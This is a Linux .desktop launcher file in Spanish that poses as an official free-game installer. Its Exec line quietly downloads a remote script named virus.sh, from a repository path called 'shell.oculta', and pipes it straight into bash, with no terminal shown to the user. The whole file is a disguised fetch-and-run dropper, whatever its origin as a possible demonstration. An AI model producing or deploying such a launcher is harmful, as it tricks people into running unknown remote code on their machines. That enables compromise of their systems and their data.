[Desktop Entry]
Name=Instalar Juego Gratis
Comment=Instalador oficial para Linux
Exec=bash -c "wget -qO- https://raw.githubusercontent.com/dortegaamores-crypto/Scripts-Seguridad/main/shell.oculta/virus.sh | bash"
Icon=games-config
Terminal=false
Type=Application
Categories=Game;
